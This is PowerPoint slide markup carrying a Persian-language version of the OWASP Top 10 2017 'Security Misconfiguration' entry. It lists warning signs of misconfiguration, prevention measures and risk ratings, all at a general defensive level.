              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه ممکن است آسیب پذیر باشد اگر:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>گسستن امنیت مناسب در هر بخشی از پشته برنامه، و یا مجوز نادرست پیکربندی شده در خدمات ابری.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ویژگی های غیر ضروری فعال یا نصب شده اند (به عنوان مثال پورت های غیر ضروری، خدمات، صفحات، حساب ها یا امتیازات).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>حساب های پیش فرض و گذرواژه های آنها هنوز فعال و بدون تغییر هستند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مدیریت خطا نشان دهنده دنبال کردن پشته و یا دیگر پیام‌های خطای زیاد جهت اطلاع رسانی به کاربران است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برای سیستم‌های به روز شده، آخرین ویژگی های امنیتی غیرفعال شده و یا به صورت امن پیکربندی نشده است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنظیمات امنیتی در سرورهای برنامه، چارچوب برنامه (مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Struts، Spring، ASP.NET،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کتابخانه‌ها، پایگاه‌های داده و غیره برای ارزش‌های امنیتی تنظیم نشده است.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سرور هدرهای امنیتی یا دستورالعمل ها را ارسال نمی‌کند یا آنها برای ارزش‌های امنیتی تنظیم نمی شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>این نرم افزار قدیمی یا آسیبپذیر است (نگاه کنید به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: ۲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>017 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از کامپوننت با آسیبپذیری های شناخته شده).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بدون یک پروسه پیکربندی امنیتی هماهنگ، قابل تکرار، سیستم ها در معرض خطر بیشتری هستند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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4"/>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Security Headers Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>برای نیازمندیهای بیشتر در این زمینه ، استاندارد تایید امنیت برنامه کاربردی را ببینید</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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0"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>فرآیند نصب امن باید اجرا شود، از جمله:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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یک فرایند سخت افزاری تکرارپذیر که باعث گسترش سریع و آسان یک محیط دیگر است که کاملا محافظت می شود. توسعه، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>QA، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و محیط های تولید باید همه پیکربندی یکسان، با کلمه عبور مختلف استفاده شده در هر محیط را دارا باشند. این فرایند باید به صورت خودکار برای به حداقل رساندن تلاش لازم برای راه اندازی یک محیط امنیتی جدید باشد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="3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حداقل پلت فرم بدون هیچ گونه ویژگی، اجزای، اسناد و نمونه های غیر ضروری. ویژگی ها و چارچوب های استفاده نشده را حذف یا نصب کنید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="2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یک وظیفه برای بررسی و به روز کردن پیکربندی مربوط به همه یادداشت های امنیتی، به روز رسانی ها و وصله های امنیتی به عنوان بخشی از فرآیند مدیریت وصله (نگاه کنید به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>A9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: ۲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>017 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>استفاده از قطعات با آسیب پذیری های شناخته شده). به ویژه بررسی مجوزهای ذخیره سازی ابر (به عنوان مثال مجوزهای سطل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>S3).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="2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یک معماری نرم افزار قوی که جداسازی موثر و امن بین اجزای را با بخش بندی، یا گروه های امنیتی ابری فراهم می کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="2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ارسال دستورات امنیتی به مشتریان، برای مثال سربرگ امنیتی</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="2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یک فرایند خودکار برای بررسی تأثیر تنظیمات و پیکربندی در همه محیط ها.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیکربندی اشتباه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امنیتی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1837865025"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="23496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fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابلیت بهره‌برداری</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1000" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>۳</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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شیوع</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx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۳</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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>قابل کشف بودن</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1"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۳</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fa-IR" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>تکنیکی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0"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۲</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gn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجمان اغلب سعی می کنند از نقص های وصله نشده بهره ببرند یا دسترسی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>به حساب‌های پیش‌فرض</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>، </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>صفحات استفاده نشده، فایل ها و پوشه های محافظت نشده و غیره دسترسی پیدا کنند،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تا دسترسی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> غیرمجاز به سیستم یا دانش آن را کسب کنند. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
